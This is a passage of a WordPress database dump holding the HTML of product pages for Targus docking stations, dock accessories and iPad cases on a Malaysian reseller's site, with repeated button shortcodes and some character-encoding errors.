locking feature helps prevent accidental disconnects (keyboard not included)</li><li>Detachable hand strap (included) and integrated Surface Pen holder (pen not included)</li><li>Compatible with Surface Type Cover</li><li>Compatible with Surface Dock</li><li>Full access to camera and ports</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>','Targus','','inherit','closed','closed','','3686-revision-v1','','','2019-11-05 11:29:57','2019-11-05 03:29:57','',3686,'https://bintara.com.my/blog/2019/11/05/3686-revision-v1/',0,'revision','',0),(3697,1,'2019-11-05 11:55:37','2019-11-05 03:55:37','[vfb id=14]','Get Quotation (Targus)','','publish','closed','closed','','get-quotation-targus','','','2019-11-05 12:01:03','2019-11-05 04:01:03','',0,'https://bintara.com.my/?page_id=3697',0,'page','',0),(3698,1,'2019-11-05 11:55:37','2019-11-05 03:55:37','[vfb id=14]','Get Quotation (Targus)','','inherit','closed','closed','','3697-revision-v1','','','2019-11-05 11:55:37','2019-11-05 03:55:37','',3697,'https://bintara.com.my/blog/2019/11/05/3697-revision-v1/',0,'revision','',0),(3700,1,'2019-11-06 12:38:19','2019-11-06 04:38:19','<p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/files/safeguard-your-valuables-safeport-rugged-ipad-case_300x300.jpg?v=1556613126\" alt=\"safeport rugged ipad case\" /></p><h2>Safeguard Your Valuables</h2><p>At Targus, protecting your devices is our top priority. Tablets are easily secured with our premium collection of iPad cases and otherÂ tablet casesÂ - includingÂ Field-ReadyÂ andÂ RuggedÂ options for outdoor and industrial environments. We even have laptop backpacks with hidden zippered pockets and purpose-built compartments for your keys, phone, and other personal belongings.</p>		\n		<h2>Expand Your Potential</h2><p>At Targus, weâ€™re about much more than just laptop backpacks. Our docking stations offer the convenience of universal connections, providing compatibility with multiple brands including Apple (Mac), Dell, Lenovo, HP, Acer, and Asus. This enables you to quickly plug in and connect at your home office, workstation, or on the road. Give your laptop wings as you easily connect to PC accessories like external monitors, speakers, keyboard/mice, and laptop chargers.</p><p>4K docking stationsÂ are the perfect companion for media and design creatives, offering a quality four times that of 1080P high-definition. OurÂ dual display universal docking stations hook up to two monitors for accelerated productivity and ease of transition between documents. You can find all the cables, adapters, and storage trays you need in our collection of docking station accessories.</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/files/expand-your-potential-dock520usz-quad-docking-station_300x300.jpg?v=1556613316\" alt=\"expand your potential dock quad docking station\" width=\"519\" height=\"348\" /></p>		\n			<h1>Docking Stations</h1>		\n		<h3 style=\"text-align: center;\"><strong>USB-Câ„¢ Universal QUAD HD (QVHD) Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK520USZ)</p><h3 style=\"text-align: center;\"><strong>USB-Câ„¢ Universal DV4K Docking Station with 100W Power</strong></h3><p style=\"text-align: center;\">(DOCK190AP)</p><h3 style=\"text-align: center;\"><strong>Thunderboltâ„¢ 3 DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK220AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/DOCK520USZ_MAIN1_1024x1024.png?v=1558464095\" width=\"222\" height=\"222\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0042963_usb-c-universal-dv4k-docking-station-with-100w-power_grande.jpg?v=1543989907\" alt=\"USB-Câ„¢ Universal DV4K Docking Station with 100W Power\" width=\"210\" height=\"210\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/Dock220_grande.jpg?v=1553684715\" alt=\"Thunderboltâ„¢ 3 DV4K Docking Station with Power\" width=\"214\" height=\"214\" /></p><ul><li>Supports four HD (1920 x 1080 p60) displays or two 2K (2560 x 1440 p50) displays via 4 HDMI ports</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C 3.0 Port with power (15W non-PD)</li></ul><ul><li>Supports dual 4K Ultra HD monitor video via 2 DisplayPortâ„¢ (DP 1.2a) and 2 HDMI (HDMI 2.0) ports</li><li>Power Delivery up to 100W</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C USB 3.1 Gen 1 device port</li><li>Includes 1-meter USB-C to C host cable (detachable) and 1 standard lock slot</li><li>Power tips included to power AcerÂ®, ASUSÂ®, CompaqÂ®, Dellâ„¢, FujitsuÂ®, GatewayÂ®, HPÂ®, IBM/Lenovoâ„¢, and Toshiba</li></ul><ul><li>0.5M passive 40G, 5A cable (C/M to C/M)</li><li>Cable lock slot</li><li>Power Delivery 2.0 up to 85W</li><li>Supports dual-display</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK171)</p><h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK177)</p><h3 style=\"text-align: center;\"><strong>Universal USB 3.0 DV4K Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK160AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACP71USZ_grande.png?v=1551118350\" alt=\"Universal USB 3.0 DV Docking Station with Power\" width=\"197\" height=\"197\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0027659_universal-usb-30-dv4k-docking-station-with-power_grande.jpg?v=1543990156\" alt=\"Universal USB 3.0 DV4K Docking Station with Power\" width=\"205\" height=\"205\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/dock160usz_grande.png?v=1554473002\" alt=\"Universal USB 3.0 DV4K Docking Station\" width=\"205\" height=\"205\" /></p><ul><li>Dual 2048 x 1152 at 60Hz 24 bpp color video (single 2K 2560 x 1440 at 50Hz HDMI) leveraging the DisplayLink DL-3900 technology</li><li>19VDC PC laptop power and charging up to 90W</li><li>Removable standalone power and charging tip compartment</li><li>Integrated lock slot accommodates industry-standard security locks</li><li>Wedge design for laptop mounting</li><li>Includes detachable 1-meter USB ÂµB to A host cable</li><li>Includes 120W AC adapter and power connected purple LED light</li><li>Includes detachable 1-meter DC host power and charging cable</li></ul><ul><li>Dual DisplayPort 1.2++ (with MST), dual HDMI 2.0, or one of each external monitor port</li><li>19VDC PC laptop power and charging up to 90W</li><li>Removable standalone tip compartment</li><li>Integrated lock slot accommodates industry-standard security locks</li><li>Wedge design for laptop mounting</li><li>Includes detachable 1-meter USB 3.0 uB to A host cable</li><li>Includes 120W AC adapter and power connected purple LED light</li><li>Includes detachable 1-meter DC host power and charging cable</li><li>Dual 4K2K up to 4096x2160 60Hz (p60) 24 bpp color video monitor support leveraging the DisplayLink DL-6950 chipset</li></ul><ul><li>Dual DisplayPort (DP 1.2a) or Dual HDMI (HDMI 2.0) video or one of each</li><li>Dual 4K Ultra HD video 4096x2160 60Hz (p60) 24 bpp with 6-Channel (5.1) Audio</li><li>1 USB-C device port (USB 3.0 5Gbps data only)</li><li>1 Gigabit Ethernet port for wired connectivity</li><li>4 USB 3.0 ports for the latest peripherals (1 BC1.2 fast device-charging port)</li><li>1 3.5mm combo Audio In/Out port for mics, speakers, and earphones</li><li>Includes 1-meter USB-ÂµB/M to A/M cable (detachable)</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates standard industry-security locks to safeguard equipment</li><li>Universal compatibility with the majority of laptop and PC tablet brands and platforms</li><li>Includes 45W AC adapter</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>USB-C Universal DV4K Docking Station with Power</strong></h3><p style=\"text-align: center;\">(DOCK180AP)</p><h3 style=\"text-align: center;\"><strong>USB-C Universal Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK410AP)</p><h3 style=\"text-align: center;\"><strong>2K Universal Docking Station</strong></h3><p style=\"text-align: center;\">(DOCK120AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0030076_usb-c-universal-dv4k-docking-station-with-power_grande.jpg?v=1544442889\" alt=\"USB-C Universal DV4K Docking Station with Power\" width=\"234\" height=\"234\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0041279_usb-c-universal-docking-station-black.jpeg\" width=\"236\" height=\"236\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/DOCK120USZ_ACP120US_50_MAIN-ALT2_grande.png?v=1549657702\" alt=\"2K Universal Docking Station\" width=\"238\" height=\"238\" /></p><ul><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) port support dual 4k Ultra HD monitors</li><li>Power Delivery 2.0 provides up to 60W charging</li><li>Thunderboltâ„¢ 3 compatible</li><li>1 USB-C device port (USB 3.0 data only)</li><li>1 Gigabit Ethernet port for secure, wire speed Ethernet access</li><li>4 USB 3.0 ports for the latest peripherals (1 fast device-charging port)</li><li>Includes 1-meter USB-C to C host cable (detachable)</li><li>1 3.5mm combo Audio In/Out for mics, speakers, and earphones</li><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) ports support dual 4K Ultra HD monitors</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates industry-standard security locks</li></ul><ul><li>1 Gigabit Ethernet Port for wired access at ultra-fast speeds</li><li>Ergonomic wedge design for comfortable typing</li><li>Integrated lock slot accommodates standard security locks to safeguard equipment</li><li>Universal compatibility with popular laptop and PC tablet brands and operating systems</li></ul><ul><li>1 Audio In/Out port for mics, speakers and earphones</li><li>1 DVI-I and 1 HDMI port supports dual monitors (up to 2048 x 1152 x 60 fps)</li><li>1 Gigabit Ethernet port for wired access at ultra-fast speeds</li><li>3 USB 3.0 SuperSpeed ports for the latest peripherals</li><li>1 USB 3.0 powered port for fast device charging</li><li>Integrated Lock Slot accommodates security locks to safeguard equipment</li><li>Universal compatibility with popular brands and operating systems</li><li>1 DisplayPort port supports a single 2K monitor (up to 2560 x 1600 x 30 fps)</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaLink Universal Dual Video Travel Dock</strong></h3><p style=\"text-align: center;\">(DOCK110AP)</p><h3 style=\"text-align: center;\"><strong>USB-C DisplayPortâ„¢ Alt-Mode Travel Dock</strong></h3><p style=\"text-align: center;\">(DOCK411)</p><h3 style=\"text-align: center;\"><strong>USB-C Alt-Mode Travel Dock w/ PD</strong></h3><p style=\"text-align: center;\">(DOCK412AP)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/dock110usz_grande.jpg?v=1553684661\" alt=\"VersaLink Universal Dual Video Travel Dock\" width=\"259\" height=\"180\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0027522_usb-c-displayport-alt-mode-travel-dock_1024x1024.png?v=1546599971\" width=\"181\" height=\"181\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0050999_usb-c-alt-mode-travel-dock-w-pd-black_150.png\" alt=\"Picture of USB-C Alt-Mode Travel Dock w/ PD (Black)\" width=\"187\" height=\"187\" /></p><ul><li>VGA video port with 2048 x 1152 at 60 FPS resolution. HDMI video port with 2560 x 1440 at 50 FPS resolution. Gigabit Ethernet port for secure, wire speed Ethernet access. 2 USB SuperSpeed 3.0 ports for mice, flash drives, external hard drives and card readers.</li><li>Integrated USB power cable connects to laptops, 2-in-1s and Microsoft Surface.</li><li>Compact, smartphone-size dock weighs less than 5.5 ounces for easy portability</li><li>Mac or PC compatible</li></ul><ul><li>Host-powered 90 mm tethered USB Type-C DisplayPortâ„¢ Alt-Mode (compatible with Thunderboltâ„¢ 3) host connection</li><li>VGA up to 2048 x 1152 60Hz or HDMI2.0 up to 4096 x 2160 30Hz 24 bpp monitor connection</li><li>1 USB 3.1 Gen 1 5Gbps (USB 3.0) Type-A port</li><li>1 Gigabit Ethernet port</li><li>HDMI includes 6 (5.1) channel audio</li><li>Universal compatibility with popular WindowsÂ® and macOSâ„¢ platforms</li><li>Compact size thatâ€™s ideal for travel</li></ul><ul><li>mDP (4096 x 2160 p30 max)</li><li>HDMI (4096 x 2160 p30 max)</li><li>VGA (1920 x 1200)</li><li>USB-C upstream cable (Laptop charging capable by PD pass through)</li><li>2 x USB 3.1 Gen 1 type A downstream port</li><li>1 x USB-C PD pass through (up to 60W) port with USB 3.1 Gen 1 downstream data support</li><li>Gigabit Ethernet; Lock Slot</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Dock Accessories</h1>		\n		<h3 style=\"text-align: center;\"><strong>USB-C to USB-A Cable</strong></h3><p style=\"text-align: center;\">(ACC1104GLX)</p><h3 style=\"text-align: center;\"><strong>3-Pin 3-Way Hydra DC Power Cable</strong></h3><p style=\"text-align: center;\">(ACC1009USX)</p><h3 style=\"text-align: center;\"><strong>USB-C Multiplexer Adapter</strong></h3><p style=\"text-align: center;\">(ACA46USZ)</p><h3 style=\"text-align: center;\"><strong>USB-C Alt-Mode Travel Dock w/ PD</strong></h3><p style=\"text-align: center;\">(ACA42USZ)</p><p><img src=\"https://www.targus.com/content/images/thumbs/0053546_usb-cf-to-usb-30-am-cable.jpeg\" width=\"188\" height=\"188\" /></p><p><img src=\"https://www.targus.com/content/images/thumbs/0030033_3-pin-3-way-hydra-dc-power-cable.png\" width=\"187\" height=\"187\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACA47GLZ_MAIN1_grande.png?v=1564601685\" alt=\"USB-C Multiplexer Adapter\" width=\"189\" height=\"189\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/ACA42USZ_grande.jpg?v=1553683594\" alt=\"USB-Câ„¢ Demultiplexer\" width=\"194\" height=\"194\" /></p><ul><li>USB Type-C female to USB 3.0 Type-A cable</li><li>10cm long with tether</li><li>Transfers data at rates up to 5 Gbps</li><li>Compatible with Targus DOCK180USZ</li></ul><ul><li>Powers up to 1 large and 1 small device simultaneously</li><li>Supports three connectors for multi-user and multi-device environments</li><li>Self-locking collars ensure tips and power cable stay in place</li><li>Uses existing Targus power cable and power tips from your powered dock (not included)</li></ul><ul><li>Supports USB-C laptops</li><li>Works with Targus docks DOCK171USZ, DOCK177USZ, ACP77USZ and ACP71USZ</li><li>Compact size for easy carrying</li><li>Provides up to 85W of power with PD 2.0 and charges USB-C devices that accept charging via the USB-C port</li><li>5 different charge profiles to ensure compatibility</li><li>Includes USB-A, 2-pin DC Power, and 3-pin DC power ports; outputs USB-C</li></ul><ul><li>1 USB-C/F port</li><li>Enables support for legacy host devices</li><li>Uses universal 3-pin power tip support</li><li>For use with DOCK 180</li><li>Supports power delivery charging up to 60W</li><li>Supports USB 3.0 data transfer up 5 Gbps</li><li>1 USB 3.0 Type A/M cable</li><li>1 Targus 3 pin DC power cable (with tips for various laptop models)</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Tablet Cases</h1>		\n		<h3 style=\"text-align: center;\"><strong>VersaVuÂ® Multi-Gen for 9.7\" IPad Pro, iPad Air 1, And 2</strong></h3><p style=\"text-align: center;\">(THZ634GL)</p><h3 style=\"text-align: center;\"><strong>3D Protection</strong><strong>â„¢ </strong><strong style=\"font-size: 1.25rem;\">Multi-Gen for </strong><strong style=\"font-size: 1.25rem;\">9.7 </strong><strong style=\"font-size: 1.25rem;\">iPad Pro, iPad Air 1, and 2</strong></h3><p style=\"text-align: center;\">(THZ635GL)</p><h3 style=\"text-align: center;\"><strong>New Pro-Tek Rotating iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73711GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/THZ634GL_FRONT_grande.png?v=1549412474\" alt=\"Black VersaVuÂ® Classic Case (Black) for iPadÂ® (2017/2018) (THZ634GL) - Front\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/0024531_3d-protection-case-black-for-ipad-20172018-97-inch-ipad-pro-ipad-air-2-and-ipad-air_1024x1024.jpg?v=1547855512\" width=\"194\" height=\"194\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0121/0014/1114/products/THZ73711GL_MAIN1_grande.png?v=1569597181\" alt=\"Pro-Tek Rotating Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Silver\" width=\"198\" height=\"198\" /></p><ul><li>Passes military grade 4ft. drop testing (MIL-STD 810G)</li><li>Patented 360Â° rotation for portrait/landscape views</li><li>Adjustable viewing angles and comfortable typing angle</li><li>Precision cut access to controls, ports, and camera</li><li>Tray design enhances audio performance</li><li>Integrated stylus holder protects your Apple Pencilâ„¢ or stylus</li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2</li><li>Convenient sleep/wake function works with iPad Pro (9.7-inch), iPad Air 1 and 2</li></ul><ul id=\"product-features\"><li>Passes military grade 4ft. drop testing (MIL-STD 810G)</li><li>Infinite viewing angles plus comfortable typing position</li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2</li><li>Flexible tray with reinforced corners and bezel protection</li><li>Precision-cut access to controls, ports, and camera lenses</li><li>Easy-grip textured cover with secure magnetic wrap closure</li><li>Tray design enhances audio performance</li><li>Convenient sleep/wake function works with iPad ProÂ  (9.7-inch), iPad Air 1 and 2</li></ul><ul id=\"product-features\"><li>Color Black / Charcoal &amp; Silver</li><li>Passes military grade 4ft. drop testing</li><li>Geometric Pro-Tekâ„¢ design enhances protection</li><li>Reinforced corners guard against impact</li><li>Patented 360Â° rotation for portrait/landscape viewing</li><li>Virtually infinite viewing angles and comfortable typing position</li><li>Precision-cut access to controls, ports, and camera</li><li>Audio-enhancing sound scoops boost sound performance</li><li>Secure magnetic wrap closure</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>New Click-In iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73608GL)</p><h3 style=\"text-align: center;\"><strong>New VersaVu </strong><strong>iPad 9.7\" 2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73803GL)</p><h3 style=\"text-align: center;\"><strong>New VersaVu Signature iPad 9.7\" </strong><strong>2018 / 2017 Pro, Air 1 &amp; 2</strong></h3><p style=\"text-align: center;\">(THZ73902GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73608GL_MAIN1_grande.jpg?v=1571711592\" alt=\"Click-In Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Rose Gold\" width=\"196\" height=\"196\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73803GL_MAIN1_grande.jpg?v=1571711592\" alt=\"VersaVu Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Red\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ73902GL_MAIN1_grande.jpg?v=1571711592\" alt=\"VersaVu Signature Case for iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Blue\" width=\"197\" height=\"197\" /></p><ul><li>Available Color Black/Charcoal, Rose Gold &amp; Silver</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision cut access to controls, ports, and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic closure ensures secure transport</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal, Blue &amp; Red</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Precision control, port and camera cutouts deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal &amp; Blue</li><li>Passes military grade 4ft. drop testing for robust protection</li><li>Premium fabric/faux leather exterior with metallic accents delivers standout style</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple Pencil/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu </strong><strong>11-inch </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74413GL)</p><h3 style=\"text-align: center;\"><strong>Pro-Tek </strong><strong>11-inchÂ  </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ73803GL)</p><h3 style=\"text-align: center;\"><strong>VersaVu Signature </strong><strong>11-inch </strong><strong>iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74502GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad Pro (11-inch) - Burgundy\" width=\"190\" height=\"190\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\" alt=\"Pro-Tekâ„¢ Rotating Case for iPad Pro (11-inch) - Black\" width=\"192\" height=\"192\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"192\" height=\"194\" /></p><ul><li>Available Color Black &amp; Gold</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision cut access to controls, ports and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black &amp; Blue</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Geometric Pro-Tek design delivers practical protection with adaptable good looks</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Patented 360Â° rotation for portrait/landscape viewing</li><li>Precision cut access to controls, ports and camera lenses</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black/Charcoal &amp; Blue</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu </strong><strong>11-inch</strong><strong> iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ74413GL)</p><h3 style=\"text-align: center;\"><strong>Pro-Tekâ„¢ </strong><strong>Rotating Case </strong><strong>12.9-inch iPadÂ® Pro</strong></h3><p style=\"text-align: center;\">(THZ748GL)</p><h3 style=\"text-align: center;\"><strong>VersaVuÂ® Classic Case for </strong><strong>12.9-inch </strong><strong>iPadÂ® Pro</strong></h3><p style=\"text-align: center;\">(THZ749GL)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050396_versavu-classic-case-for-11-in-ipad-pro-burgundy_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad Pro (11-inch) - Burgundy\" width=\"195\" height=\"195\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050315_pro-tek-rotating-case-for-11-in-ipad-pro-black_grande.jpg?v=1571711589\" alt=\"Pro-Tekâ„¢ Rotating Case for iPad Pro (11-inch) - Black\" width=\"192\" height=\"192\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050385_versavu-classic-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Classic Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"196\" height=\"196\" /></p><ul><li>Available Color Black, Red &amp; Burgundy</li><li>Passes military grade 4â€™ drop testing for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing</li><li>Geometric Pro-Tekâ„¢ design delivers practical protection and enhances stability</li><li>Patented custom-molded tray with reinforced corners guard against impact</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing</li><li>Precision control, port, and camera cutouts deliver hassle-free listening and photos</li><li>Boosts sound with audio scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul id=\"product-features\"><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing* for robust protection</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Patented custom-moulded tray with reinforced corners enhances impact protection</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Precision control, port and camera cut-outs deliver hassle-free listening and photos</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Magnetic wrap closure ensures secure transport</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu Signature </strong><strong>12.9-inchÂ </strong><strong> iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ750GL)</p><h3 style=\"text-align: center;\"><strong>SafePort Rugged </strong><strong>Case for </strong><strong>12.9-inch iPad </strong><strong>(6th gen. / 5th gen.)</strong></h3><p style=\"text-align: center;\">(THD138GLZ)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050377_versavu-signature-series-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Signature Series Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"190\" height=\"190\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/3_THD138GLZ_BACK2_1024x1024.jpg?v=1571711592\" width=\"189\" height=\"189\" /></p><ul><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing* for robust protection</li><li>Premium fabric/faux leather exterior with metallic accents delivers standout style</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime 